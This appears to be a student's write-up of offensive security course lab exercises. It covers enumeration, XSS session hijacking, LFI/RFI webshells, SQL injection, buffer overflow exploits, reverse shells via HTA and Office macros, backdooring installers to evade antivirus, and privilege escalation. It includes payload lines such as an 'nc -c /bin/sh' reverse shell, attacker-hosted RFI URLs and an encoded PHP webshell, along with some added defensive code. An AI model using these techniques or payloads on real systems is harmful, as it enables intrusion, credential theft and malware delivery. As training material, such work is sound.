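        build_tcp_header(40000, 110, TCP_ACK),
        build_tcp_header(40001, 110, TCP_SYN),             # SYN scan: SYN
        build_tcp_header(110, 40001, TCP_SYN | TCP_ACK),   #   SYN/ACK
        build_tcp_header(40001, 110, TCP_RST),             #   RST, handshake never completed
        build_tcp_header(40002, 111, TCP_SYN),             # closed port: SYN
        build_tcp_header(111, 40002, TCP_RST | TCP_ACK),   #   RST/ACK
    ]


if __name__ == "__main__":
    cap = sample_capture()
    print("SYN-only packets:", filter_flags(cap, TCP_SYN, exact=True))
    print("ACK or PSH packets:", filter_flags(cap, TCP_ACK | TCP_PUSH))
    for flow, verdict in classify_flows(cap).items():
        print(flow, verdict)
```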

7.3.2.1 Exercises
1. Use Nmap to make a list of the SMB servers in the lab that are running
Windows.

2. Use NSE scripts to scan these systems for SMB vulnerabilities.

3. Use nbtscan and enum4linux against these systems to identify the types of data you can obtain
from different versions of Windows

nbtscan

Enum4linux

7.4.2.1 Exercises

1. Use Nmap to make a list of machines running NFS in the labs.

2. Use NSE scripts to scan these systems and collect additional information about accessible
shares.

7.5.1.1 Exercises
1. Search your target network range to see if you can identify any systems that respond to the

SMTP VRFY command.

Nmap scan using a script that sends VRFY command

2. Try using this Python code to automate the process of username discovery using a text file

with usernames as input.

Usernames file

7.6.3.6 Exercises

1. Scan your target network with onesixtyone to identify any SNMP servers.

2. Use snmpwalk and snmp-check to gather information about the discovered targets.

8.2.4.1 Exercises
1. Follow the steps above to create your own unauthenticated scan of Gamma.
Steps:

1. Defining the target

2. Configuring the scan definitions

3. Launching the scan

3. Run the scan with Wireshark open and identify the steps the scanner performed to
complete the scan.

Ans: As we can see in the screenshot below, Nessus first scans for common ports.

After discovering the common open ports, the scanner automatically enumerates the services on
the target machine. In the screenshot below we can see that the scanner attempts to enumerate
the NetBIOS-SSN and SMB services.

After that the scanner performs a full port scan of the target: as we can see from the
screenshot below, a large number of TCP SYN packets are sent to the target.

Now, as we can see in the screenshot below, the scanner has discovered open port 80 and is
scanning the HTTP server on that port for vulnerabilities.

4. Review the results of the scan.

The scan discovered a lot of information: several medium-severity vulnerabilities and some
critical vulnerabilities related to CGI bin attacks.

8.2.5.1 Exercises
1. Follow the steps above to create your own authenticated scan of your Debian client.

2. Review the results of the scan.

8.2.6.1 Exercises
1. Follow the steps above to create your own individual scan of Beta.

3. Run Wireshark or tcpdump during the individual scan. What other ports does Nessus scan? Why
do you think Nessus scans other ports?

Ans: Many plugins check the state of hard-coded default ports before connecting to them. Ports
outside the configured port-scan range have an unknown state because they were never scanned,
and by default the get_port_state() function returns TRUE when the state is unknown, so the
connection is attempted anyway. The policy setting "Consider unscanned ports as closed" makes
get_port_state() return FALSE for unknown ports, which prevents connection attempts to ports
outside the scan range (as long as the plugin performs a state check before connecting).

4. Review the results of the scan.

8.3.1.1 Exercise
1. Find an NSE script similar to the NFS Exported Share Information Disclosure that
was executed in the “Scanning with Individual Nessus Plugins” section. Once found, run
the script against Beta in the PWK labs.

9.3.3.1 Exercise
1. Spend some time reviewing the applications available under the Web Application
Analysis menu in Kali Linux.

Nikto

Burp Suite

DirBuster

9.4.1.2 Exercises
1. Use Burp Intruder to gain access to the phpMyAdmin site running on your Windows
10 lab machine.

Inspecting the site source code for the set_session parameter

Setting the delimiter

Assigning the recursive grep to the payload

Running Intruder

3. Insert a new user into the “users” table

9.4.2.5 Exercises
1. Exploit the XSS vulnerability in the sample application to get the admin cookie and
hijack the session. Remember to use the PowerShell script on your Windows 10 lab
machine to simulate the admin login.

Injected payload.

Using admin_login.ps1 to simulate the login.

Captured session cookie

Adding the admin cookie to our session

Session hijacked

2. Consider what other ways an XSS vulnerability in this application might be used for attacks.

Destruction of key site elements: as you can see in the screenshot above, the option to
create a comment has been removed from the page by the injected script.

3. Does this exploit attack the server or clients of the site?

Ans: This attack affects the clients of the site. The server only stores and reflects the
payload; the injected JavaScript runs in the browser of every user who views the page, which is
why the admin's cookie could be stolen without compromising the server itself.

9.4.3.2 Exercise

1. Exploit the directory traversal vulnerability to read arbitrary files on your Windows 10 lab
machine.

9.4.4.5 Exercises
1. Obtain code execution through the use of the LFI attack.

Sent payload.

Code execution.

2. Use the code execution to obtain a full shell.

Created a PHP webshell payload file with msfvenom and started an SMB server

Transferred the payload to the target via SMB

Using the LFI vulnerability to execute the webshell

Got a shell as student

9.4.4.7 Exercises
1. Exploit the RFI vulnerability in the web application and get a shell.

Started a Python HTTP server on port 80 and created a PHP webshell

Added the URL of my machine, http://192.168.119.123/shell.php, in the file parameter and got
the shell.

3. Using /menu2.php?file=current_menu as a starting point, use RFI to get a shell.

Started a Python HTTP server on port 80 and created a PHP webshell

Upon making the request we can see in the screenshot below that the target is not able to find
the file, even though I have hosted it on my Python server.

Looking at the Python server's STDOUT we can see that the request from the target does reach
the attacker machine, but with a repeated .php extension: the application appends .php to
whatever is passed in the file parameter.

So we make the request without the .php extension:

http://192.168.123.10/menu2.php?file=http://192.168.119.123/shell

and receive a shell.

4. Use one of the webshells included with Kali to get a shell on the Windows 10 target.

Using the webshell in “/usr/share/webshells/php/qsd-php-backdoor.php”

9.4.4.10 Exercises
1. Exploit the LFI vulnerability using a PHP wrapper.

2. Use a PHP wrapper to get a shell on your Windows 10 lab machine.

Using the PHP wrapper with a PowerShell base64-encoded payload
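The traversal, LFI, RFI and PHP wrapper exercises all abuse the same kind of include statement. The following is an added example, not the lab application's code: it models the include logic behind menu2.php?file=... in Python. The vulnerable resolver simply appends ".php" to the user's value (which is why the target requested shell.php.php when the full filename was given, and why "shell" without the extension worked), and the hardened resolver beside it accepts only a plain menu name that resolves inside a fixed directory, which shuts out ../ traversal, http:// includes and the php:// and data:// wrappers. The directory name and file contents are constructed.

```python
# Added example (not the lab application's code): the include logic behind
# menu2.php?file=... modelled in Python. The vulnerable resolver appends ".php" to whatever
# the user supplies; the hardened resolver serves only plain menu names from a fixed
# directory. Directory name and file contents are constructed.
import os
import tempfile


class MenuResolver:
    def __init__(self, base_dir):
        self.base_dir = os.path.realpath(base_dir)

    def vulnerable(self, file_param):
        """Mirrors include($_GET['file'] . '.php'): traversal, PHP wrappers and remote URLs
        all pass straight through to the include call."""
        return file_param + ".php"

    def hardened(self, file_param):
        """Only an allow-listed name, resolved and confirmed to stay inside base_dir."""
        if ":" in file_param:
            raise ValueError("remote or wrapper include refused")     # http://, php://, data://
        if not file_param or not file_param.replace("_", "").isalnum():
            raise ValueError("menu name may contain only letters, digits and underscore")
        candidate = os.path.realpath(os.path.join(self.base_dir, file_param + ".php"))
        if os.path.commonpath([candidate, self.base_dir]) != self.base_dir:
            raise ValueError("path escapes the include directory")  # ../ or symlink tricks
        if not os.path.isfile(candidate):
            raise FileNotFoundError(file_param)
        return candidate


def is_accepted(resolver, file_param):
    """True if the hardened resolver would include the file, False if it refuses."""
    try:
        resolver.hardened(file_param)
        return True
    except (ValueError, FileNotFoundError):
        return False


def make_demo_dir():
    """Constructed include directory holding the one legitimate menu file."""
    base = tempfile.mkdtemp(prefix="menus_")
    with open(os.path.join(base, "current_menu.php"), "w") as fh:
        fh.write("<?php echo 'menu'; ?>")
    return base


# Payloads from the exercises: traversal, RFI with and without the appended-extension
# problem, the php://filter wrapper and a data:// wrapper carrying a PHP one-liner.
PAYLOADS = [
    "current_menu",
    "../../../../windows/win.ini",
    "http://192.168.119.123/shell.php",
    "http://192.168.119.123/shell",
    "php://filter/convert.base64-encode/resource=current_menu",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+",
]

if __name__ == "__main__":
    r = MenuResolver(make_demo_dir())
    for p in PAYLOADS:
        print(f"{p!r:70} vulnerable -> {r.vulnerable(p)!r:45} hardened -> {is_accepted(r, p)}")
```

The order of the checks matters: the scheme test catches every wrapper and remote URL before any filesystem call happens, and the realpath comparison is kept as defence in depth against symlinks inside the include directory even though the character allow-list already rejects ../.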

9.4.5.4 Exercises
1. Interact with the MariaDB database and manually execute the commands required to
authenticate to the application. Understand the vulnerability.

Executing the SQL query used by the web application at login time displays the matching row of
the users table.

Adding a double quote in the username field after admin, followed by OR 1=1 #, makes the WHERE
clause always true and turns the rest of the statement into a comment. We are able to dump the
whole table.

3. SQL inject the username field to bypass the login process.

3. Why is the username displayed like it is in the web application once the authentication
process is bypassed?

Ans: The page prints the username with echo "<h2>Welcome " . $_SESSION['user'], and the
session value is set from what we entered in the username textbox in login.php rather than from
the database row, which is why the SQL injection string itself appears in the greeting.

4. Execute the SQL injection in the password field. Is the “LIMIT 1” necessary in the payload?
Why or why not?

Ans: “LIMIT 1” is necessary because the application's database functions expect a single
record. Without it the injected condition matches every row in the users table, and a query
that returns more than one row either raises an error or fails the application's single-row
check, so the login does not succeed.

9.4.5.9 Exercises
1. Enumerate the structure of the database using SQL injection.

Getting username

2. Understand how and why you can pull data from your injected commands and have it displayed
on the screen.

3. Extract all users and associated passwords from the database.
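The login bypass, the LIMIT 1 question and the extraction of the users table can all be reproduced without the lab. The following is an added example, not the lab application's PHP: it builds the same string-concatenated query against an in-memory SQLite database, models the application's single-record check and its habit of storing the submitted username in the session, and puts the parameterised query beside it. SQLite does not accept MariaDB's # comment, so the payloads end in -- instead; the table contents are constructed.

```python
# Added example (not the lab application's PHP): the login bypass, the LIMIT 1 question and the
# UNION extraction reproduced against an in-memory SQLite database, with the vulnerable
# string-built query beside the parameterised one. Table contents are constructed. SQLite
# does not accept MariaDB's '#' comment, so the payloads end in '-- ' instead; the
# injection itself is unchanged.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES
            ('admin', 'md5-of-admin-password'),
            ('john',  'md5-of-john-password'),
            ('peter', 'md5-of-peter-password');
        CREATE TABLE menu (id INTEGER PRIMARY KEY, item TEXT, price TEXT);
        INSERT INTO menu (item, price) VALUES ('Coffee', '2.50'), ('Bagel', '3.00');
    """)
    return db


def login_vulnerable(db, username, password):
    """Mirrors the app: the query is built by concatenation, and on success the *submitted*
    username is stored in the session, which is why the injected string is echoed back."""
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    rows = db.execute(sql).fetchall()
    if len(rows) != 1:          # the app's single-record check: more than one row is a failure
        return None
    return username


def login_safe(db, username, password):
    """Parameterised: the input is bound as data and can never alter the statement."""
    rows = db.execute("SELECT id FROM users WHERE username=? AND password=?",
                      (username, password)).fetchall()
    return username if len(rows) == 1 else None


def search_vulnerable(db, term):
    """A page that prints every row it gets back: the sink for UNION-based extraction."""
    return db.execute(f"SELECT item, price FROM menu WHERE item LIKE '%{term}%'").fetchall()


def extract_users(db):
    """Exercise 3 of 9.4.5.9: pull every username and password through the search page.
    The 'zzz' prefix makes the original LIKE match nothing, so only injected rows come back."""
    return search_vulnerable(db, "zzz' UNION SELECT username, password FROM users -- ")


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1 LIMIT 1 -- "
    print("username field, with LIMIT 1 :", login_vulnerable(db, payload, "wrong"))
    print("username field, no LIMIT 1   :", login_vulnerable(db, "admin' OR 1=1 -- ", "wrong"))
    print("password field               :", login_vulnerable(db, "admin", "' OR 1=1 LIMIT 1 -- "))
    print("parameterised                :", login_safe(db, payload, "wrong"))
    print("extracted                    :", extract_users(db))
```

The second line of output is the answer to the LIMIT 1 question in executable form: without it the injected condition returns three rows and the single-record check rejects the login even though the WHERE clause was bypassed.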


9.4.5.11 Exercises
1. Exploit the SQL injection along with the MariaDB INTO OUTFILE function to obtain
code execution.

Injecting code into the SQL query

Code execution

2. Turn the simple code execution into a full shell.

Using a PowerShell base64-encoded payload

9.4.5.13 Exercises
1. Use sqlmap to obtain a full dump of the database.

2. Use sqlmap to obtain an interactive shell.

9.5.1 Exercises (Reporting is not required for these exercises)

10.2.5 Exercises
1. Repeat the steps shown in this section to see the 12 A’s copied onto the stack.

Passing 12 A’s as the argument to strcpy.exe

Running the program up to the return instruction, we can see the 12 A’s on the stack as the
hex value 41.

2. Supply at least 80 A’s and verify that EIP after the strcpy will contain the value
41414141.

Generating 80 A’s with Python

Using the 80 A’s as the argument to strcpy.exe

EIP overwritten

11.1.1.1 Exercises
1. Build the fuzzer and replicate the SyncBreeze crash.

Fuzzer written in Python 3

2. Inspect the content of other registers and stack memory. Does anything seem to be
directly influenced by the fuzzing input?

The EIP register is overwritten with A's, so the saved return address on the stack was
overwritten by the fuzzing input.

11.2.3.1 Exercises
1. Write a standalone script to replicate the crash.

2. Determine the offset within the input buffer to successfully control EIP.

3. Update your standalone script to place a unique value into EIP to ensure your offset is
correct.

11.2.5.1 Exercises
1. Repeat the required steps in order to identify the bad characters that cannot be included in
the payload.

Script sending the bad-character buffer

Using mona.py to identify the bad characters

After close inspection and multiple iterations it is concluded that 0x00, 0x0A, 0x0D, 0x25,
0x26, 0x2B and 0x3D are the bad characters.

2. Why are these characters not allowed? How do these bad hex characters translate to ASCII?

0x00 is the null byte, which terminates a C string: the string copy stops at it, so anything
after a null byte in our shellcode never reaches the buffer.
0x0A is the line feed ‘\n’ and 0x0D is the carriage return ‘\r’; together they terminate a line
of the HTTP request, so the server stops reading the field there.
0x25 is ‘%’, which introduces a URL-encoded byte (%xx), so the server decodes the bytes that
follow it instead of using them as sent.
0x26 is ‘&’, which separates parameters in the URL-encoded POST body.
0x2B is ‘+’, which URL-decodes to a space.
0x3D is ‘=’, which separates a parameter name from its value in the POST body.
In every case the application parses or rewrites the byte rather than copying it unchanged into
the buffer, which is why the bytes after it in memory no longer match what was sent.
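The bad-character hunt is an iterative compare loop, and the pieces of it can be written down. The following is an added example, not the report's script: badchar_buffer() builds the 0x01..0xFF probe with the bytes already known to be bad removed (what the script serving the bad characters sends), first_mangled() compares the bytes the debugger shows on the stack with what was sent (what mona's compare command reports), and find_badchars() repeats the cycle until the buffer survives intact. fake_syncbreeze() is a constructed stand-in for the target that drops everything from the first metacharacter onward; it is not the real server.

```python
# Added example (not the report's script): the bad-character workflow for the SyncBreeze
# exploit. badchar_buffer() builds the probe, first_mangled() does the memory comparison,
# find_badchars() repeats the cycle. fake_syncbreeze() is a constructed stand-in for the
# target, not the real server.

def badchar_buffer(exclude=(0x00,)):
    """Every byte value 1..255 except those already known to be bad (0x00 is never sent)."""
    return bytes(b for b in range(1, 256) if b not in set(exclude))


def first_mangled(sent, dumped):
    """(offset, expected_byte, actual_byte) for the first difference, None if the copy is
    intact. A dump shorter than what was sent means the copy stopped early; the byte at the
    cut-off is reported with actual_byte=None."""
    for i, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return i, s, d
    if len(dumped) < len(sent):
        return len(dumped), sent[len(dumped)], None
    return None


def find_badchars(send_and_dump, known=(0x00,), limit=32):
    """Iterate exactly like the manual process: send, read memory, exclude the first corrupted
    byte, repeat. send_and_dump(buf) stands in for 'run the PoC and read the stack in the
    debugger'."""
    bad = list(known)
    for _ in range(limit):
        buf = badchar_buffer(bad)
        diff = first_mangled(buf, send_and_dump(buf))
        if diff is None:
            return sorted(bad)
        bad.append(diff[1])
    raise RuntimeError("still finding bad characters after %d rounds" % limit)


# Constructed model of how SyncBreeze treats the username field of the POST body: NUL ends the
# string copy and CR, LF, '%', '&', '+', '=' are consumed by the HTTP/URL-encoding parser.
_METACHARS = {0x00, 0x0a, 0x0d, 0x25, 0x26, 0x2b, 0x3d}


def fake_syncbreeze(buf):
    out = bytearray()
    for b in buf:
        if b in _METACHARS:
            break
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    print([hex(b) for b in find_badchars(fake_syncbreeze)])
```

Only one bad character is removed per round, on purpose: once the target has mangled a byte, everything after it in memory is unreliable, so a single comparison can only be trusted up to the first difference. That is why the manual process in the exercise takes several runs.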

11.2.7.1 Exercises
1. Locate the JMP ESP that is usable in the exploit.

2. Update your PoC to include the discovered JMP ESP, set a breakpoint on it, and follow the
execution to the placeholder shellcode.

Updated script.

Set a breakpoint at the JMP ESP instruction.

Stepping into the JMP ESP shows that execution continues at ‘\x5c\x74\x98\x02’, which is our
placeholder for the shellcode.

11.2.9.1 Exercises
1. Update your PoC to include a working payload.

2. Attempt to execute your exploit without using a NOP sled and observe the decoder corrupting
the stack.

As we can see in the screenshot below, the decoder is corrupting the stack.

4. Add a NOP sled to your PoC and obtain a shell from SyncBreeze

Added 10 NOPs in front of the shellcode.

Executed the exploit and got a shell.

11.2.10.1 Exercise
1. Update the exploit so that SyncBreeze still runs after exploitation.

Generated the payload with EXITFUNC=thread so that only the exploited thread exits, leaving the
service running.

Got a reverse shell.

12.2.1.1 Exercises
1. Log in to your dedicated Linux client using the credentials you received.

2. On your Kali machine, recreate the proof-of-concept code that crashes the Crossfire
server.

3. Attach the debugger to the Crossfire server, run the exploit against your Linux client,
and confirm that the EIP register is overwritten by the malicious buffer.

As we can see in the screenshot below, EIP has been overwritten with ASCII “A” (0x41414141).

12.3.1.1 Exercises
1. Determine the correct buffer offset required to overwrite the return address on the stack.

Created a unique pattern using msf-pattern_create

Crashed the program, copied the value of the EIP register and looked it up in the pattern.

Found the offset at 4368 bytes.

2. Update your stand-alone script to ensure your offset is correct.
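The offset step used in 11.2.3.1 and again here relies on the unique cyclic pattern from msf-pattern_create and the lookup done by msf-pattern_offset. The following is an added example, not the report's script: it generates the same Aa0Aa1... pattern, looks a crash value up in it taking x86 byte order into account, and builds the buffer used to confirm the offset with a unique marker in EIP. The register value 0x46367046 in the demo is simply what sits at offset 4368 of the pattern (the Crossfire offset found above); it is not a value read from the lab screenshots.

```python
# Added example (not the report's script): the cyclic pattern that msf-pattern_create emits
# and the lookup msf-pattern_offset performs, plus the offset-confirmation buffer from
# 11.2.3.1 exercise 3. The value 0x46367046 is what the pattern holds at offset 4368, not a
# value taken from the lab.
import string

_MAX_LEN = 26 * 26 * 10 * 3     # 20280 bytes before the sequence would repeat


def pattern_create(length):
    """Aa0Aa1Aa2...: every 3-byte triplet is unique within the first 20280 bytes."""
    if length > _MAX_LEN:
        raise ValueError("pattern longer than %d bytes would repeat" % _MAX_LEN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip, length=_MAX_LEN):
    """eip: the crash value as shown in the debugger, e.g. 0x46367046 (an int) or the 4 raw
    bytes. x86 is little-endian, so the register value is the 4 pattern bytes reversed."""
    needle = eip.to_bytes(4, "little") if isinstance(eip, int) else bytes(eip)
    return pattern_create(length).find(needle)      # -1 when the value is not from the pattern


def offset_check_buffer(offset, marker=b"BBBB", filler=b"C", total=4400):
    """A's up to the offset, a unique marker that should land in EIP, then filler so the
    crash still happens. With the default marker EIP should read 0x42424242."""
    tail = max(total - offset - len(marker), 0)
    return b"A" * offset + marker + filler * tail


if __name__ == "__main__":
    print(pattern_create(24))                 # b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7'
    print(pattern_offset(0x46367046))         # 4368
    buf = offset_check_buffer(4368)
    print(buf[4368:4372])                     # b'BBBB'
```

A -1 from pattern_offset() is itself informative: it means EIP did not come from the pattern at all, usually because the buffer was mangled by a bad character or the crash happened somewhere other than the return address.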

12.5.1.1 Exercises
1. Determine the opcodes required to generate a first stage shellcode using msf-nasm_shell.

3. Identify the bad characters that cannot be included in the payload and return address.

After close inspection of the characters we can see that \x00 and \x20 are the bad characters.

12.6.1.1 Exercises
1. Find a suitable assembly instruction address for the exploit using EDB.

Found jmp esp at 0x08134596

2. Include the first stage shellcode and return address instruction in your proof-of-concept and
ensure that the first stage shellcode is working as expected by single stepping through it in the
debugger.

Stepping into the breakpoint at jmp esp, EIP now points to the first stage of the payload.

Stepping further, we can see the instructions add eax,12 and jmp eax being executed, which
finally lands in the “A’s” we sent to crash the application, i.e. the start of the buffer where
the final payload will be placed.

12.7.1.1 Exercises

1. Update your proof-of-concept to include a working payload.

2. Obtain a shell from the Crossfire application with and without a debugger.

Got a shell with the debugger attached.

Got a shell without the debugger.

13.1.2.3 Exercises
Note: Reporting is not required for these exercises

13.2.2.1 Exercises
1. Use msfvenom to generate an HTML Application and use it to compromise your Windows client.

Generating the HTA payload.

Searching for and executing the malicious HTA file

Got a reverse shell.

2. Is it possible to use the HTML Application attack against Microsoft Edge users, and if so, how?

Yes, it is possible, and the process is exactly the same for Edge as it was for Internet
Explorer. The difference is that the user is prompted twice before execution: Edge checks for a
valid digital signature before running the download, and because our malicious file is unsigned
it shows a warning prompt, as in the screenshot below.

13.3.2.1 Exercise
1. Use the PowerShell payload from the HTA attack to create a Word macro that sends a reverse
shell to your Kali system.

Added the macro.

Opened the DOTM file.

Got a reverse shell.

13.3.3.1 Exercise
1. Use the PowerShell payload to create a batch file and embed it in a Microsoft Word
document to send a reverse shell to your Kali system.

Created launch.bat

Got a reverse shell.

13.3.4.1 Exercises
1. Trigger the protection by Protected View by simulating a download of the
Microsoft Word document from the Internet.

Simulating downloading the file from the Internet.

Protected View triggered.

2. Reuse the batch file and embed it in a Microsoft Publisher document to receive a
reverse shell to your Kali system.

Embedding the batch file in a Publisher document.

3. Move the file to the Apache web server to simulate the download of the Publisher
document from the Internet and confirm the missing Protected View.

Simulating downloading the Publisher file from the Internet.

Opening the file, we can see that Protected View is not triggered: Publisher does not implement
it, so the embedded object can be run directly.

Running the object.

Got a reverse shell.

14.3.1.1 Exercises
1. Connect to your dedicated Linux client and start the vulnerable Apache James
service using the /usr/local/james/bin/run.sh script.

Connected to the dedicated client and started the Apache James service.

2. Enumerate the target using port scanning utilities and use information from the
banners and Internet searches to determine the software running on the machine.

3. Use the searchsploit tool to find exploits for this version on the online resources
mentioned in this module.

4. Launch the exploit and verify that the payload is executed upon logging in to the
machine.

Launched the exploit.

Payload executed: as you can see in the screenshot below, the exploit has created a
proof.txt file.

5. Attempt to modify the payload variable in order to get a reverse shell on the
target machine.

Modified the exploit to get a reverse shell.

Triggered the exploit by logging in via SSH and got the reverse shell.

15.1.3.1 Exercises
1. Locate the exploit discussed in this section using the searchsploit tool in Kali Linux.

2. Install the mingw-w64 suite in Kali Linux and compile the exploit code.

15.1.4.1 Exercises
1. Modify the connection information in the exploit in order to target the SyncBreeze
installation on your Windows client.

2. Recompile the exploit and use Wireshark to confirm that the code successfully
initiates a socket connection to your dedicated Windows client.

Recompiling.

The code successfully initiated a socket connection with the Windows client.

15.1.5.1 Exercise
1. Find any valid return address instruction and alter the one present in the original
exploit.

As we previously developed an exploit for SyncBreeze, we reuse the return address from that
exploit (see EIP in the screenshot).

Modifying the return address in the exploit code.

15.1.6.1 Exercises
1. Generate a reverse shell payload using msfvenom while taking into account the bad
characters of our exploit.

2. Replace the original payload with the newly generated one.

4. Attach the debugger to the target process and set a breakpoint at the return address
instruction.

Attached to the process and set a breakpoint at 10090C83.

5. Compile the exploit and run it. Did you hit the breakpoint?

Compiled the exploit and ran it.

The breakpoint was not hit.

15.1.7.1 Exercises
1. Fix the overflow buffer such that the EIP register will be overwritten by your
chosen return address instruction.

Modified the buffer size.

Recompiled the exploit and got a shell.

2. Install the ASX to MP3 Converter application located under the
C:\Tools\fixing_exploits directory; download the exploit for ASX to MP3 Converter from
EDB and edit it in order to get a shell on your dedicated Windows machine.

Found the return address for the exploit to be 0x1003789D

Re-fuzzed the application to get the correct buffer length, which was found to be 241 bytes.

Found the bad characters “\x00\x0a\x1a” and generated shellcode using msfvenom.

Reflected all the modifications (buffer length, EIP, shellcode, NOPs) in the exploit
code downloaded from https://www.exploit-db.com/exploits/38382.

Loading exploit.asx into the vulnerable application.

Got a reverse shell.

15.2.3.1 Exercises
1. Connect to your dedicated Linux lab client and start the apache2 service; the
target web application is located under /var/www/https/.

Connected to the Linux lab client and started the web server.

2. Modify the original exploit and set the base_url variable to the correct IP
address of your dedicated Linux lab client as well as the protocol to HTTPS.

3. Get familiar with the requests Python library and adjust your exploit
accordingly to avoid SSL verification.

4. Edit the username and password variables to match the ones from our test
case (username “admin”, password “HUYfaw763”).

6. Try to run the exploit against the Linux lab client, does it work? If not, try to explain why.

The exploit does not work: it fails with an index out of range error, which is most likely
caused by a mismatch in the csrf_param variable, i.e. the CSRF parameter name the exploit
searches for is not the one used by the target page.

15.2.4.1 Exercises
1. Observe the error that is generated when running the exploit.

2. Attempt to troubleshoot the code and determine why the error occurs.

The error occurs because the target uses a different CSRF parameter name than the one
hard-coded in the exploit, so the search for it returns nothing and the index lookup fails.

3. Modify the exploit in order to avoid the error and run it against your dedicated Linux
client.

Exploit modified.

Ran the exploit against the Linux client.

4. Verify that your exploit worked by attempting to execute the whoami command using
the remote php shell.

Exploit worked.

5. Attempt to obtain a fully interactive shell with this exploit.

Using the payload nc -c /bin/sh 192.168.119.190 447

Got a reverse shell.

16.1.3.2 Exercises
(Reporting is not required for these exercises)

16.2.5.1 Exercises
(Reporting is not required for these exercises)

17.3.3.2 Exercises
1. Review the code from the PowerShell script and ensure that you have a basic
understanding of how it works.

In the screenshot below we can see that the script imports several functions from
different DLLs. This part of the script imports the VirtualAlloc and CreateThread functions
from kernel32.dll and the memset function from msvcrt.dll; these functions allow us to
allocate memory, write arbitrary data to the allocated memory, and create an execution thread.

The next part of the code, in the screenshot below, allocates a block of memory of 4096
(0x1000) bytes using VirtualAlloc with read/write/execute permissions, and copies each byte of
the payload stored in $sc into the newly allocated memory using memset.

In the final part, the script creates a new thread with CreateThread whose start address is the
allocated buffer, so the payload executes in the new thread.

2. Get a meterpreter shell back to your Kali Linux machine using PowerShell.

Generated the payload.

Executed the payload.

Got a meterpreter shell.

3. Attempt to get a reverse shell using a PowerShell one-liner rather than a script.

One-liner.

Got a reverse shell.

17.3.3.4 Exercises
1. Inject a meterpreter reverse shell payload in the WinRAR executable.

Injecting code into the WinRAR installer.

2. Transfer the binary to your Windows client and ensure that it is not being detected by
the antivirus.

Running a scan on the “temp” folder where the malicious executable is stored.

3. Run the WinRAR installer and migrate your meterpreter shell to prevent a disconnect.

Ran the installer.

Got a meterpreter reverse shell.

4. Attempt to find different executables and inject malicious code into them using
Shellter.

Injecting malicious code into the 7-Zip executable: injection was successful.

Injecting malicious code into “ChromeSetup.exe”: injection was successful.

18.1.1.13 Exercise

1. Perform various manual enumeration methods covered in this section on both your
dedicated Windows and Linux clients. Try experimenting with various options for the
tools and commands used in this section.

Enumerating users.

Linux

Windows

Enumerating the hostname.

Linux

Windows

Enumerating the operating system version and architecture.

Linux

Windows

Enumerating running processes and services

Linux

Windows

Enumerating networking information.

Linux

Windows

Enumerating firewall status and rules.

Linux

Windows

Enumerating scheduled tasks.

Linux

Windows

Scheduled tasks

Enumerating installed applications and patch levels.

Linux

dpkg -l

Windows

Enumerating readable/writable files and directories

Linux

Windows

Enumerating unmounted disks

Windows

Linux

Enumerating device drivers and kernel modules

Windows

Linux

Enumerating binaries that AutoElevate

Windows

Linux

18.1.2.1 Exercises
1. Inspect your Windows and Linux clients by using the tools and commands presented
in this section in order to get comfortable with manual local enumeration techniques.

Windows

Linux

2. Experiment with different windows-privesc-check and unix_privesc_check options.

Linux

Using the detailed option of the unix-privesc-check tool

Windows

Using the options -all -dump with the windows-privesc-check2.exe tool

18.2.3.1 Exercise
1. Log in to your Windows client as the admin user and attempt to bypass UAC using
the application and technique covered above.

Started procmon.exe and fodhelper.exe

Found a registry key under HKCU that fodhelper.exe queries and that we are able to create and
edit.

Set the registry value to cmd.exe

Launched cmd with the highest privileges (high integrity), without a UAC prompt.

18.2.4.1 Exercises
1. Log in to your Windows client as an unprivileged user and attempt to elevate your
privileges to SYSTEM using the above vulnerability and technique.

Found the vulnerable service running

The ServiioService.exe service binary grants full access to unprivileged users, so it can be
replaced.

C program that launches cmd.exe

Sent shell.exe (the compiled C program above) to the Windows client

Moved shell.exe to the necessary location, replacing the service binary

Escalated privileges.

Got SYSTEM.

2. Attempt to get a remote system shell rather than adding a malicious user.

C code to get a reverse shell

Placed the payload in the Serviio directory.

Got a reverse shell.

18.3.2.1 Exercise
1. Log in to your Debian client as an unprivileged user and attempt to elevate your
privileges to root using the above techniques.

Enumerated cron jobs.

Injected a reverse shell into “user_backups.sh”, the script executed by the root cron job.

Got a reverse shell.

18.3.3.1 Exercise
1. Log in to your Debian client with your student credentials and attempt to elevate your
privileges by adding a superuser account to the /etc/passwd file.

Exploiting the vulnerability.

Exploit successful.

19.1.1.1 Exercise
(Reporting is not required for this exercise)

19.2.1.1 Exercise
(Reporting is not required for this exercise)

19.3.1.1 Exercises
(Reporting is not required for these exercises)

19.3.2.1 Exercise
(Reporting is not required for this exercise)

19.3.3.1 Exercise
(Reporting is not required for this exercise)

19.3.4.1 Exercises
(Reporting is not required for these exercises)

19.4.1.1 Exercises
(Reporting is not required for these exercises)

19.4.2.1 Exercises
1. Use Mimikatz to extract the password hash of an administrative user from the
Windows client.

2. Reuse the password hash to perform a pass-the-hash attack from your Kali
system and obtain code execution on your Windows client.

Got a shell by passing the hash.

19.4.3.1 Exercise
(Reporting is not required for this exercise)

20.1.1.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.

2. Attempt to replicate the port-forwarding technique covered in the above scenario.
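The port forwarding in this scenario is a plain TCP relay: whatever arrives on the listening port is connected through to the target and copied in both directions. The following is an added example, not part of the lab or of rinetd: it implements that relay in Python, with a constructed echo service standing in for the target behind the pivot so the full path (client, relay, target) can be exercised on loopback. All addresses and ports are constructed.

```python
# Added example (not part of the lab): the port forwarding done with rinetd in this scenario
# implemented as a small Python relay, with a constructed echo service standing in for the
# target behind the pivot so the whole path can be exercised on loopback.
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until the source closes, then shut both sockets down."""
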